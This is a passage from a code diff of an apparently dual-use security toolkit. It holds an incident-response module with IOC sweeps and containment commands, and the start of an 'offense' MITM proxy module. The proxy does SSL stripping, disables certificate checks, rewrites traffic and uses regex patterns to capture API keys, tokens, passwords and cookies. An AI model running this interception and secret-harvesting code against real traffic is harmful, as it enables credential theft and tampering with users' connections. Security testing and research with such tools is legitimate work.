+        edir = self._evidence_dir(incident_id)
+        ts = datetime.now().strftime('%Y%m%d_%H%M%S')
+        safe_name = re.sub(r'[^a-zA-Z0-9_-]', '_', name)
+        filename = f'{ts}_{safe_name}.txt'
+        filepath = edir / filename
+
+        with open(filepath, 'w', encoding='utf-8', errors='replace') as f:
+            f.write(content)
+
+        # Update evidence count
+        incident['evidence_count'] = incident.get('evidence_count', 0) + 1
+        incident['updated'] = self._now_iso()
+        self._save_incident(incident)
+
+        # Log in timeline
+        self.add_timeline_event(incident_id, self._now_iso(),
+                                f'Evidence added: {name}', 'evidence',
+                                f'Type: {evidence_type}, File: {filename}, Size: {len(content)} bytes')
+
+        return {
+            'name': name,
+            'filename': filename,
+            'type': evidence_type,
+            'size': len(content),
+            'collected_at': self._now_iso(),
+            'preview': content[:500] if content else '',
+        }
+
+    def list_evidence(self, incident_id):
+        """List all evidence files for an incident."""
+        edir = self._evidence_dir(incident_id)
+        evidence = []
+        if not edir.exists():
+            return evidence
+        for f in sorted(edir.iterdir()):
+            if f.is_file():
+                stat = f.stat()
+                evidence.append({
+                    'filename': f.name,
+                    'name': f.stem,
+                    'size': stat.st_size,
+                    'collected_at': datetime.fromtimestamp(stat.st_mtime).isoformat(),
+                })
+        return evidence
+
+    def get_evidence_content(self, incident_id, filename):
+        """Return the content of a specific evidence file."""
+        filepath = self._evidence_dir(incident_id) / filename
+        if not filepath.exists():
+            return {'error': 'Evidence file not found'}
+        try:
+            content = filepath.read_text(encoding='utf-8', errors='replace')
+            return {'filename': filename, 'content': content, 'size': 
 len(content)}
+        except Exception as e:
+            return {'error': str(e)}
+
+    # ── IOC Sweep ────────────────────────────────────────────────
+
+    def sweep_iocs(self, incident_id, iocs):
+        """Scan local system for indicators of compromise.
+
+        iocs = {
+            'ips': ['1.2.3.4', ...],
+            'domains': ['evil.com', ...],
+            'hashes': ['sha256:abcdef...', ...],
+        }
+        """
+        incident = self._load_incident(incident_id)
+        if not incident:
+            return {'error': 'Incident not found'}
+
+        matches = []
+        ip_list = [ip.strip() for ip in iocs.get('ips', []) if ip.strip()]
+        domain_list = [d.strip() for d in iocs.get('domains', []) if d.strip()]
+        hash_list = [h.strip() for h in iocs.get('hashes', []) if h.strip()]
+
+        # Check network connections against IP list
+        if ip_list:
+            if _is_win:
+                _, netout = self._run_cmd('netstat -an')
+            else:
+                _, netout = self._run_cmd('ss -tulnp 2>/dev/null || netstat -tulnp 2>/dev/null')
+
+            for ip in ip_list:
+                if ip in netout:
+                    matches.append({
+                        'type': 'ip',
+                        'ioc': ip,
+                        'found_in': 'active_connections',
+                        'severity': 'critical',
+                        'details': f'IP {ip} found in active network connections',
+                    })
+
+        # Check running processes against hash list
+        if hash_list:
+            if _is_win:
+                _, proc_out = self._run_cmd('wmic process get ExecutablePath /format:csv')
+                proc_paths = [line.split(',')[-1].strip() for line in proc_out.splitlines()
+                              if '\\' in line]
+            else:
+                _, proc_out = self._run_cmd("ls -1 /proc/*/exe 2>/dev/null | xargs readlink 2>/dev/null | sort -u")
+                proc_paths = [p.strip() for p in proc_out.splitlines() if p.strip()]
+
+            for proc_path in proc_paths:
+                if not os.path.isfile(proc_path):
+                    continue
+                try:
+                    with open(proc_path, 'rb') as fh: data = fh.read()  # read once; close handle
+                    sha, md5 = hashlib.sha256(data).hexdigest(), hashlib.md5(data).hexdigest()
+                    for h in hash_list:
+                        hval = h.split(':')[-1] if ':' in h else h
+                        if hval.lower() in (sha.lower(), md5.lower()):
+                            matches.append({
+                                'type': 'hash',
+                                'ioc': h,
+                                'found_in': proc_path,
+                                'severity': 'critical',
+                                'details': 
f'Hash match on running process: {proc_path}', + }) + except (PermissionError, OSError): + continue + + # Check DNS cache against domain list + if domain_list: + if _is_win: + _, dns_out = self._run_cmd('ipconfig /displaydns') + else: + _, dns_out = self._run_cmd( + 'cat /etc/hosts 2>/dev/null; ' + 'grep -r "query" /var/log/syslog 2>/dev/null | tail -200') + + for domain in domain_list: + if domain.lower() in dns_out.lower(): + matches.append({ + 'type': 'domain', + 'ioc': domain, + 'found_in': 'dns_cache', + 'severity': 'high', + 'details': f'Domain {domain} found in DNS cache/logs', + }) + + # Store sweep results as evidence + result = { + 'total_iocs': len(ip_list) + len(domain_list) + len(hash_list), + 'matches_found': len(matches), + 'matches': matches, + 'swept_at': self._now_iso(), + } + + self.add_evidence(incident_id, 'ioc_sweep_results', + json.dumps(result, indent=2), evidence_type='ioc_sweep') + + self.add_timeline_event(incident_id, self._now_iso(), + f'IOC sweep completed: {len(matches)} matches from {result["total_iocs"]} indicators', + 'sweep', json.dumps({'matches': len(matches)})) + + return result + + # ── Timeline ───────────────────────────────────────────────── + + def add_timeline_event(self, incident_id, timestamp, event, source, details=None): + """Add an event to the incident timeline.""" + timeline = self._load_timeline(incident_id) + entry = { + 'timestamp': timestamp, + 'event': event, + 'source': source, + 'details': details or '', + } + timeline.append(entry) + # Sort chronologically + timeline.sort(key=lambda e: e.get('timestamp', '')) + self._save_timeline(incident_id, timeline) + return entry + + def get_timeline(self, incident_id): + """Get the full chronological timeline for an incident.""" + return self._load_timeline(incident_id) + + def auto_build_timeline(self, incident_id): + """Automatically build timeline from collected evidence by parsing timestamps.""" + incident = self._load_incident(incident_id) + if not incident: + 
return {'error': 'Incident not found'} + + evidence_files = self.list_evidence(incident_id) + events_added = 0 + edir = self._evidence_dir(incident_id) + + # Timestamp patterns + patterns = [ + # ISO 8601 + (r'(\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}:\d{2})', '%Y-%m-%dT%H:%M:%S'), + # Syslog + (r'([A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})', None), + # Windows Event Log + (r'Date:\s+(\d{1,2}/\d{1,2}/\d{4}\s+\d{1,2}:\d{2}:\d{2}\s*[AP]M)', '%m/%d/%Y %I:%M:%S %p'), + ] + + for ef in evidence_files: + filepath = edir / ef['filename'] + try: + content = filepath.read_text(encoding='utf-8', errors='replace') + except Exception: + continue + + lines = content.splitlines() + for line in lines[:500]: # limit to first 500 lines per file + for pattern, fmt in patterns: + match = re.search(pattern, line) + if match: + ts_str = match.group(1) + try: + if fmt: + ts_str = ts_str.replace('T', ' ') + dt = datetime.strptime(ts_str.strip(), fmt.replace('T', ' ')) + ts_iso = dt.isoformat() + else: + # Syslog format — use current year + year = datetime.now().year + dt = datetime.strptime(f'{year} {ts_str}', '%Y %b %d %H:%M:%S') + ts_iso = dt.isoformat() + except ValueError: + continue + + # Extract a useful event description from the line + event_text = line[match.end():].strip()[:200] + if event_text: + self.add_timeline_event( + incident_id, ts_iso, + event_text, + ef['filename'], + f'Auto-extracted from {ef["filename"]}') + events_added += 1 + break # only match first pattern per line + + if events_added >= 200: + break + if events_added >= 200: + break + + self.add_timeline_event(incident_id, self._now_iso(), + f'Auto-built timeline: {events_added} events extracted', + 'system', f'Parsed {len(evidence_files)} evidence files') + + return { + 'events_added': events_added, + 'evidence_parsed': len(evidence_files), + 'total_timeline_events': len(self._load_timeline(incident_id)), + } + + # ── Containment ────────────────────────────────────────────── + + def contain_host(self, incident_id, 
host, actions): + """Execute containment actions against a host/IP. + + actions: list of strings from ['block_ip', 'kill_process', 'disable_user', 'isolate_network'] + """ + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + results = [] + + for action in actions: + if action == 'block_ip': + if _is_win: + success, out = self._run_cmd( + f'netsh advfirewall firewall add rule name="AUTARCH-IR-Block-{host}" ' + f'dir=in action=block remoteip={host}') + else: + success, out = self._run_cmd(f'iptables -A INPUT -s {host} -j DROP') + results.append({ + 'action': 'block_ip', + 'target': host, + 'success': success, + 'output': out, + }) + + elif action == 'kill_process': + # host here is treated as PID or process name + if _is_win: + success, out = self._run_cmd(f'taskkill /F /PID {host} 2>nul || taskkill /F /IM {host} 2>nul') + else: + success, out = self._run_cmd(f'kill -9 {host} 2>/dev/null || pkill -9 {host} 2>/dev/null') + results.append({ + 'action': 'kill_process', + 'target': host, + 'success': success, + 'output': out, + }) + + elif action == 'disable_user': + if _is_win: + success, out = self._run_cmd(f'net user {host} /active:no') + else: + success, out = self._run_cmd(f'usermod -L {host} 2>/dev/null; passwd -l {host} 2>/dev/null') + results.append({ + 'action': 'disable_user', + 'target': host, + 'success': success, + 'output': out, + }) + + elif action == 'isolate_network': + if _is_win: + cmds = [ + f'netsh advfirewall firewall add rule name="AUTARCH-IR-Isolate-In" dir=in action=block remoteip=any', + f'netsh advfirewall firewall add rule name="AUTARCH-IR-Isolate-Out" dir=out action=block remoteip=any', + ] + else: + cmds = [ + 'iptables -P INPUT DROP', + 'iptables -P OUTPUT DROP', + 'iptables -P FORWARD DROP', + # Allow loopback + 'iptables -A INPUT -i lo -j ACCEPT', + 'iptables -A OUTPUT -o lo -j ACCEPT', + ] + all_ok = True + combined = [] + for cmd in cmds: + s, o = self._run_cmd(cmd) + 
combined.append(o) + if not s: + all_ok = False + results.append({ + 'action': 'isolate_network', + 'target': host, + 'success': all_ok, + 'output': '\n'.join(combined), + }) + + # Update incident status to contained + if incident['status'] in ('open', 'investigating'): + incident['status'] = 'contained' + incident['updated'] = self._now_iso() + self._save_incident(incident) + + # Log all actions + action_summary = ', '.join(f'{r["action"]}:{r["target"]}={"OK" if r["success"] else "FAIL"}' for r in results) + self.add_timeline_event(incident_id, self._now_iso(), + f'Containment actions executed', 'containment', + action_summary) + + # Store as evidence + self.add_evidence(incident_id, 'containment_actions', + json.dumps(results, indent=2), evidence_type='containment') + + return {'results': results, 'status': incident.get('status')} + + # ── Reporting ──────────────────────────────────────────────── + + def generate_report(self, incident_id): + """Generate a comprehensive post-incident report.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + timeline = self._load_timeline(incident_id) + evidence = self.list_evidence(incident_id) + playbook = IR_PLAYBOOKS.get(incident['type'], {}) + steps = playbook.get('steps', []) + progress = incident.get('playbook_progress', []) + + completed_steps = sum(1 for p in progress if p) + total_steps = len(steps) + + # Build report sections + report = { + 'title': f'Incident Report: {incident["name"]}', + 'incident_id': incident['id'], + 'generated_at': self._now_iso(), + 'executive_summary': { + 'incident_name': incident['name'], + 'incident_type': incident['type'], + 'severity': incident['severity'], + 'status': incident['status'], + 'created': incident['created'], + 'closed': incident.get('closed'), + 'duration': self._calc_duration(incident['created'], incident.get('closed')), + 'description': incident['description'], + }, + 'timeline': timeline, + 'timeline_summary': 
f'{len(timeline)} events recorded', + 'evidence_summary': { + 'total_evidence': len(evidence), + 'evidence_list': [{'name': e['name'], 'size': e['size'], + 'collected_at': e['collected_at']} for e in evidence], + }, + 'playbook_progress': { + 'playbook_name': playbook.get('name', 'N/A'), + 'completed_steps': completed_steps, + 'total_steps': total_steps, + 'completion_pct': int(completed_steps / total_steps * 100) if total_steps > 0 else 0, + 'steps': [], + }, + 'actions_taken': [], + 'resolution': incident.get('resolution_notes', ''), + 'recommendations': self._generate_recommendations(incident['type']), + 'lessons_learned': [], + } + + for i, step in enumerate(steps): + done = progress[i] if i < len(progress) else False + report['playbook_progress']['steps'].append({ + 'step': i + 1, + 'title': step['title'], + 'completed': done, + }) + + # Extract containment actions from timeline + for event in timeline: + if event.get('source') in ('containment', 'playbook'): + report['actions_taken'].append({ + 'timestamp': event['timestamp'], + 'action': event['event'], + 'details': event.get('details', ''), + }) + + return report + + def _calc_duration(self, start_str, end_str): + """Calculate human-readable duration between two ISO timestamps.""" + try: + start = datetime.fromisoformat(start_str.replace('Z', '+00:00')) + if end_str: + end = datetime.fromisoformat(end_str.replace('Z', '+00:00')) + else: + end = datetime.now(timezone.utc) + delta = end - start + hours = int(delta.total_seconds() // 3600) + minutes = int((delta.total_seconds() % 3600) // 60) + if hours > 24: + days = hours // 24 + hours = hours % 24 + return f'{days}d {hours}h {minutes}m' + return f'{hours}h {minutes}m' + except Exception: + return 'unknown' + + def _generate_recommendations(self, incident_type): + """Generate post-incident recommendations based on incident type.""" + recs = { + 'ransomware': [ + 'Implement network segmentation to limit lateral movement', + 'Deploy endpoint detection and 
response (EDR) on all systems', + 'Implement immutable backups with offline/offsite copies', + 'Enable application whitelisting on critical servers', + 'Conduct regular phishing awareness training', + 'Implement email attachment sandboxing', + ], + 'data_breach': [ + 'Deploy Data Loss Prevention (DLP) tools', + 'Implement database activity monitoring', + 'Enable multi-factor authentication on all accounts', + 'Encrypt sensitive data at rest and in transit', + 'Implement least-privilege access controls', + 'Conduct regular access reviews', + ], + 'insider_threat': [ + 'Implement user behavior analytics (UBA)', + 'Enable comprehensive audit logging', + 'Enforce separation of duties', + 'Implement DLP with content-aware policies', + 'Conduct regular access certification reviews', + 'Establish clear data handling policies', + ], + 'ddos': [ + 'Subscribe to a DDoS mitigation service', + 'Implement rate limiting at all network layers', + 'Deploy a web application firewall (WAF)', + 'Configure SYN flood protection on all servers', + 'Implement anycast DNS for resilience', + 'Create and test DDoS runbooks quarterly', + ], + 'account_compromise': [ + 'Enforce MFA on all user accounts', + 'Implement conditional access policies', + 'Deploy password manager for the organization', + 'Enable login anomaly detection', + 'Implement session timeout policies', + 'Conduct regular credential audits', + ], + 'malware': [ + 'Deploy next-gen antivirus with behavioral detection', + 'Implement application whitelisting', + 'Enable automatic OS and application patching', + 'Restrict macro execution in Office documents', + 'Implement email gateway scanning', + 'Deploy network-level malware detection', + ], + 'phishing': [ + 'Deploy advanced email gateway with AI detection', + 'Implement DMARC, DKIM, and SPF for email authentication', + 'Conduct regular phishing simulation exercises', + 'Enable browser isolation for email links', + 'Implement URL rewriting and time-of-click protection', + 
'Establish easy phishing report button for users', + ], + 'unauthorized_access': [ + 'Implement zero-trust network architecture', + 'Deploy intrusion detection/prevention systems', + 'Enable comprehensive authentication logging', + 'Conduct regular vulnerability assessments', + 'Implement network access control (NAC)', + 'Deploy privileged access management (PAM)', + ], + } + return recs.get(incident_type, ['Review and update security controls']) + + def export_incident(self, incident_id, fmt='json'): + """Export the full incident package as JSON.""" + incident = self.get_incident(incident_id) + if 'error' in incident: + return incident + + # Include evidence content + edir = self._evidence_dir(incident_id) + evidence_data = [] + for ef in incident.get('evidence', []): + filepath = edir / ef['filename'] + try: + content = filepath.read_text(encoding='utf-8', errors='replace') + except Exception: + content = '[Could not read file]' + evidence_data.append({ + 'filename': ef['filename'], + 'name': ef['name'], + 'size': ef['size'], + 'collected_at': ef['collected_at'], + 'content': content, + }) + + export = { + 'incident': incident, + 'evidence_data': evidence_data, + 'report': self.generate_report(incident_id), + 'exported_at': self._now_iso(), + } + return export + + +# ── Singleton ──────────────────────────────────────────────────── + +_instance = None + + +def get_incident_resp(): + """Get or create singleton IncidentResponse instance.""" + global _instance + if _instance is None: + _instance = IncidentResponse() + return _instance + + +# ── CLI Runner ─────────────────────────────────────────────────── + +def run(): + """CLI interface for incident response module.""" + ir = get_incident_resp() + + while True: + clear_screen() + display_banner() + print(f'\n{Colors.CYAN}{"=" * 50}') + print(f' INCIDENT RESPONSE') + print(f'{"=" * 50}{Colors.RESET}\n') + + incidents = ir.list_incidents() + open_count = sum(1 for i in incidents if i['status'] != 'closed') + 
print(f' Active incidents: {open_count}\n') + + print(f' {Colors.GREEN}1{Colors.RESET} Create Incident') + print(f' {Colors.GREEN}2{Colors.RESET} List Incidents') + print(f' {Colors.GREEN}3{Colors.RESET} View Incident') + print(f' {Colors.GREEN}4{Colors.RESET} Run Playbook') + print(f' {Colors.GREEN}5{Colors.RESET} Collect Evidence') + print(f' {Colors.GREEN}6{Colors.RESET} Sweep IOCs') + print(f' {Colors.GREEN}7{Colors.RESET} Generate Report') + print(f' {Colors.RED}0{Colors.RESET} Back\n') + + choice = input(f'{Colors.CYAN}>{Colors.RESET} ').strip() + + if choice == '0': + break + + elif choice == '1': + print(f'\n{Colors.CYAN}Create New Incident{Colors.RESET}') + name = input(' Name: ').strip() + if not name: + continue + print(f' Types: {", ".join(INCIDENT_TYPES)}') + itype = input(' Type: ').strip() + print(f' Severity: {", ".join(SEVERITY_LEVELS)}') + severity = input(' Severity: ').strip() + desc = input(' Description: ').strip() + result = ir.create_incident(name, itype, severity, desc) + if 'error' in result: + print(f'\n {Colors.RED}Error: {result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.GREEN}Created incident: {result["id"]}{Colors.RESET}') + input('\n Press Enter...') + + elif choice == '2': + print(f'\n{Colors.CYAN}Incidents{Colors.RESET}\n') + for inc in incidents: + sev_color = { + 'critical': Colors.RED, 'high': Colors.YELLOW, + 'medium': Colors.CYAN, 'low': Colors.GREEN, + }.get(inc['severity'], Colors.WHITE) + print(f' {inc["id"]} | {inc["name"][:30]:30s} | ' + f'{sev_color}{inc["severity"]:8s}{Colors.RESET} | ' + f'{inc["status"]:12s} | {inc["type"]}') + if not incidents: + print(' No incidents found.') + input('\n Press Enter...') + + elif choice == '3': + iid = input('\n Incident ID: ').strip() + inc = ir.get_incident(iid) + if 'error' in inc: + print(f'\n {Colors.RED}{inc["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.BOLD}{inc["name"]}{Colors.RESET}') + print(f' Type: {inc["type"]} | Severity: {inc["severity"]} | Status: 
{inc["status"]}') + print(f' Created: {inc["created"]}') + print(f' Description: {inc.get("description", "")}') + print(f'\n Timeline events: {len(inc.get("timeline", []))}') + print(f' Evidence items: {len(inc.get("evidence", []))}') + progress = inc.get('playbook_progress', []) + done = sum(1 for p in progress if p) + print(f' Playbook progress: {done}/{len(progress)} steps') + input('\n Press Enter...') + + elif choice == '4': + iid = input('\n Incident ID: ').strip() + inc = ir.get_incident(iid) + if 'error' in inc: + print(f'\n {Colors.RED}{inc["error"]}{Colors.RESET}') + input('\n Press Enter...') + continue + pb = ir.get_playbook(inc['type']) + if 'error' in pb: + print(f'\n {Colors.RED}{pb["error"]}{Colors.RESET}') + input('\n Press Enter...') + continue + print(f'\n {Colors.CYAN}Playbook: {pb["name"]}{Colors.RESET}\n') + progress = inc.get('playbook_progress', []) + for i, step in enumerate(pb['steps']): + done = progress[i] if i < len(progress) else False + mark = f'{Colors.GREEN}[X]{Colors.RESET}' if done else f'{Colors.RED}[ ]{Colors.RESET}' + auto_tag = f' {Colors.YELLOW}[AUTO]{Colors.RESET}' if step.get('automated') else '' + print(f' {mark} {i}: {step["title"]}{auto_tag}') + step_idx = input('\n Step # to run (or Enter to skip): ').strip() + if step_idx.isdigit(): + auto = input(' Auto-execute commands? 
(y/n): ').strip().lower() == 'y' + result = ir.run_playbook_step(iid, int(step_idx), auto=auto) + if 'error' in result: + print(f'\n {Colors.RED}{result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.GREEN}Step completed: {result["title"]}{Colors.RESET}') + if result.get('output'): + print(f'\n{result["output"][:500]}') + input('\n Press Enter...') + + elif choice == '5': + iid = input('\n Incident ID: ').strip() + print(f'\n Evidence types: {", ".join(EVIDENCE_TYPES)}') + etype = input(' Type: ').strip() + result = ir.collect_evidence(iid, etype) + if 'error' in result: + print(f'\n {Colors.RED}{result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.GREEN}Collected: {result["name"]} ({result["size"]} bytes){Colors.RESET}') + if result.get('preview'): + print(f'\n Preview:\n{result["preview"][:300]}') + input('\n Press Enter...') + + elif choice == '6': + iid = input('\n Incident ID: ').strip() + print('\n Enter IOCs (comma-separated):') + ips = input(' IPs: ').strip() + domains = input(' Domains: ').strip() + hashes = input(' Hashes: ').strip() + iocs = { + 'ips': [x.strip() for x in ips.split(',') if x.strip()], + 'domains': [x.strip() for x in domains.split(',') if x.strip()], + 'hashes': [x.strip() for x in hashes.split(',') if x.strip()], + } + result = ir.sweep_iocs(iid, iocs) + if 'error' in result: + print(f'\n {Colors.RED}{result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.CYAN}Swept {result["total_iocs"]} IOCs, ' + f'found {result["matches_found"]} matches{Colors.RESET}') + for m in result.get('matches', []): + sev_color = Colors.RED if m['severity'] == 'critical' else Colors.YELLOW + print(f' {sev_color}[{m["severity"].upper()}]{Colors.RESET} ' + f'{m["type"]}: {m["ioc"]} in {m["found_in"]}') + input('\n Press Enter...') + + elif choice == '7': + iid = input('\n Incident ID: ').strip() + report = ir.generate_report(iid) + if 'error' in report: + print(f'\n {Colors.RED}{report["error"]}{Colors.RESET}') + else: + es = 
report['executive_summary'] + print(f'\n {Colors.BOLD}{report["title"]}{Colors.RESET}') + print(f' Type: {es["incident_type"]} | Severity: {es["severity"]}') + print(f' Status: {es["status"]} | Duration: {es["duration"]}') + print(f' Timeline: {report["timeline_summary"]}') + pp = report['playbook_progress'] + print(f' Playbook: {pp["completed_steps"]}/{pp["total_steps"]} steps ({pp["completion_pct"]}%)') + print(f' Evidence: {report["evidence_summary"]["total_evidence"]} items') + print(f' Actions taken: {len(report["actions_taken"])}') + print(f'\n {Colors.CYAN}Recommendations:{Colors.RESET}') + for r in report.get('recommendations', []): + print(f' - {r}') + input('\n Press Enter...') diff --git a/modules/mitm_proxy.py b/modules/mitm_proxy.py new file mode 100644 index 0000000..53aaffb --- /dev/null +++ b/modules/mitm_proxy.py @@ -0,0 +1,1147 @@ +""" +AUTARCH MITM Proxy + +HTTP/HTTPS interception proxy with SSL stripping, request/response +modification, traffic logging, WebSocket interception, and upstream chaining. 
+""" + +import os +import sys +import re +import json +import time +import signal +import socket +import ssl +import threading +import subprocess +import uuid +import http.server +import urllib.request +import urllib.parse +from pathlib import Path +from datetime import datetime +from http.client import HTTPConnection, HTTPSConnection + +# Module metadata +DESCRIPTION = "HTTP(S) interception proxy & traffic analysis" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +sys.path.insert(0, str(Path(__file__).parent.parent)) +from core.banner import Colors, clear_screen, display_banner + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + def find_tool(name): + import shutil + return shutil.which(name) + + +# ── Secret detection patterns ──────────────────────────────────────────── + +SECRET_PATTERNS = [ + (r'(?i)(?:api[_-]?key|apikey)\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})', 'API Key'), + (r'(?i)(?:auth(?:orization)?|bearer)\s*[:=]\s*["\']?([A-Za-z0-9_\-\.]{16,})', 'Auth Token'), + (r'(?i)(?:password|passwd|pwd)\s*[:=]\s*["\']?(\S{4,})', 'Password'), + (r'(?i)(?:secret|client_secret)\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})', 'Secret'), + (r'(?i)(?:token|access_token|refresh_token)\s*[:=]\s*["\']?([A-Za-z0-9_\-\.]{16,})', 'Token'), + (r'(?i)(?:aws_access_key_id)\s*[:=]\s*["\']?(AKIA[A-Z0-9]{16})', 'AWS Key'), + (r'(?i)(?:aws_secret_access_key)\s*[:=]\s*["\']?([A-Za-z0-9/+=]{40})', 'AWS Secret'), + (r'(?i)(sk-[A-Za-z0-9]{32,})', 'OpenAI Key'), + (r'(?i)(ghp_[A-Za-z0-9]{36,})', 'GitHub PAT'), + (r'(?i)(glpat-[A-Za-z0-9_\-]{20,})', 'GitLab PAT'), + (r'(?i)(?:session|sess_id|sessionid)\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})', 'Session ID'), + (r'(?i)(?:cookie)\s*[:=]\s*["\']?(\S{16,})', 'Cookie'), + (r'Authorization:\s*(Basic\s+[A-Za-z0-9+/=]+)', 'Basic Auth Header'), + (r'Authorization:\s*(Bearer\s+[A-Za-z0-9_\-\.]+)', 'Bearer Auth Header'), + 
(r'(?i)(?:private[_-]?key)\s*[:=]\s*["\']?(\S{16,})', 'Private Key'), + (r'(?i)(eyJ[A-Za-z0-9_\-]+\.eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)', 'JWT Token'), +] + +_COMPILED_SECRETS = [(re.compile(p), label) for p, label in SECRET_PATTERNS] + + +# ── Built-in Proxy Handler ─────────────────────────────────────────────── + +class _ProxyRequestHandler(http.server.BaseHTTPRequestHandler): + """HTTP proxy request handler that logs traffic and applies rules.""" + + # Shared state — set by MITMProxy before starting the server + mitm = None + + def log_message(self, fmt, *args): + """Suppress default stderr logging.""" + pass + + def _get_upstream(self): + """Return (host, port) for upstream proxy or None.""" + if self.mitm and self.mitm._upstream_proxy: + return self.mitm._upstream_proxy + return None + + def _read_body(self): + """Read request body if Content-Length is present.""" + length = self.headers.get('Content-Length') + if length: + try: + return self.rfile.read(int(length)) + except Exception: + return b'' + return b'' + + def _apply_rules(self, method, url, req_headers, req_body, resp_status=None, + resp_headers=None, resp_body=None, phase='request'): + """Apply matching modification rules. 
Returns modified values.""" + if not self.mitm: + return req_headers, req_body, resp_headers, resp_body, None + + for rule in self.mitm._rules: + if not rule.get('enabled', True): + continue + + # URL match + url_pattern = rule.get('match_url', '') + if url_pattern: + try: + if not re.search(url_pattern, url, re.IGNORECASE): + continue + except re.error: + continue + + # Method match + match_method = rule.get('match_method', '') + if match_method and match_method.upper() != 'ANY': + if method.upper() != match_method.upper(): + continue + + action = rule.get('action', '') + params = rule.get('params', {}) + + if action == 'block': + return req_headers, req_body, resp_headers, resp_body, 'block' + + if action == 'redirect' and phase == 'request': + return req_headers, req_body, resp_headers, resp_body, params.get('target_url', url) + + if action == 'modify_header' and phase == 'request': + header_name = params.get('header_name', '') + header_value = params.get('header_value', '') + if header_name and req_headers is not None: + req_headers[header_name] = header_value + + if action == 'inject_header' and phase == 'response': + header_name = params.get('header_name', '') + header_value = params.get('header_value', '') + if header_name and resp_headers is not None: + resp_headers[header_name] = header_value + + if action == 'modify_body' and phase == 'response': + search = params.get('search', '') + replace = params.get('replace', '') + if search and resp_body is not None: + try: + if isinstance(resp_body, bytes): + resp_body = resp_body.replace( + search.encode('utf-8', errors='replace'), + replace.encode('utf-8', errors='replace') + ) + else: + resp_body = resp_body.replace(search, replace) + except Exception: + pass + + return req_headers, req_body, resp_headers, resp_body, None + + def _handle_request(self, method): + """Handle all HTTP methods.""" + start_time = time.time() + url = self.path + req_body = self._read_body() + + # Convert headers to dict + req_headers 
= {} + for key in self.headers: + req_headers[key] = self.headers[key] + + # Apply request-phase rules + req_headers, req_body, _, _, action = self._apply_rules( + method, url, req_headers, req_body, phase='request' + ) + + # Handle block action + if action == 'block': + self.send_response(403) + self.send_header('Content-Type', 'text/plain') + self.end_headers() + self.wfile.write(b'Blocked by AUTARCH MITM Proxy') + if self.mitm: + self.mitm._log_traffic(method, url, 403, req_headers, + req_body, {}, b'Blocked', 0, start_time) + return + + # Handle redirect action + if action and action != 'block': + self.send_response(302) + self.send_header('Location', action) + self.end_headers() + if self.mitm: + self.mitm._log_traffic(method, url, 302, req_headers, + req_body, {'Location': action}, b'', 0, start_time) + return + + # SSL strip: rewrite HTTPS URLs to HTTP in the request + if self.mitm and self.mitm._ssl_strip: + url = url.replace('https://', 'http://') + + # Forward the request + try: + parsed = urllib.parse.urlparse(url) + target_host = parsed.hostname or 'localhost' + target_port = parsed.port or (443 if parsed.scheme == 'https' else 80) + target_path = parsed.path + if parsed.query: + target_path += '?' 
+ parsed.query + + upstream = self._get_upstream() + + if upstream: + # Route through upstream proxy + conn = HTTPConnection(upstream[0], upstream[1], timeout=30) + conn.request(method, url, body=req_body if req_body else None, + headers=req_headers) + elif parsed.scheme == 'https': + ctx = ssl.create_default_context() + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + conn = HTTPSConnection(target_host, target_port, timeout=30, + context=ctx) + conn.request(method, target_path, body=req_body if req_body else None, + headers=req_headers) + else: + conn = HTTPConnection(target_host, target_port, timeout=30) + conn.request(method, target_path, body=req_body if req_body else None, + headers=req_headers) + + resp = conn.getresponse() + resp_body = resp.read() + resp_status = resp.status + resp_headers = dict(resp.getheaders()) + + # Apply response-phase rules + _, _, resp_headers, resp_body, _ = self._apply_rules( + method, url, req_headers, req_body, + resp_status=resp_status, resp_headers=resp_headers, + resp_body=resp_body, phase='response' + ) + + # SSL strip: rewrite HTTPS links to HTTP in response body + if self.mitm and self.mitm._ssl_strip and resp_body: + resp_body = resp_body.replace(b'https://', b'http://') + + # Send response back to client + self.send_response(resp_status) + for key, value in resp_headers.items(): + if key.lower() in ('transfer-encoding', 'content-length', + 'content-encoding'): + continue + self.send_header(key, value) + self.send_header('Content-Length', str(len(resp_body))) + self.end_headers() + self.wfile.write(resp_body) + + # Log traffic + if self.mitm: + self.mitm._log_traffic(method, url, resp_status, req_headers, + req_body, resp_headers, resp_body, + len(resp_body), start_time) + + conn.close() + + except Exception as e: + error_msg = f'MITM Proxy Error: {str(e)}'.encode('utf-8') + self.send_response(502) + self.send_header('Content-Type', 'text/plain') + self.send_header('Content-Length', str(len(error_msg))) + 
self.end_headers() + self.wfile.write(error_msg) + if self.mitm: + self.mitm._log_traffic(method, url, 502, req_headers, + req_body, {}, error_msg, 0, start_time) + + def do_GET(self): + self._handle_request('GET') + + def do_POST(self): + self._handle_request('POST') + + def do_PUT(self): + self._handle_request('PUT') + + def do_DELETE(self): + self._handle_request('DELETE') + + def do_PATCH(self): + self._handle_request('PATCH') + + def do_HEAD(self): + self._handle_request('HEAD') + + def do_OPTIONS(self): + self._handle_request('OPTIONS') + + def do_CONNECT(self): + """Handle CONNECT for HTTPS tunneling.""" + host_port = self.path.split(':') + host = host_port[0] + port = int(host_port[1]) if len(host_port) > 1 else 443 + + self.send_response(200, 'Connection Established') + self.end_headers() + + # Log the CONNECT request + if self.mitm: + self.mitm._log_traffic('CONNECT', self.path, 200, + dict(self.headers), b'', {}, + b'Tunnel established', 0, time.time()) + + +# ── MITM Proxy Core ────────────────────────────────────────────────────── + +class MITMProxy: + """HTTP/HTTPS interception proxy with traffic logging and rule engine.""" + + _instance = None + + def __init__(self): + self._running = False + self._process = None + self._server = None + self._server_thread = None + self._listen_host = '127.0.0.1' + self._listen_port = 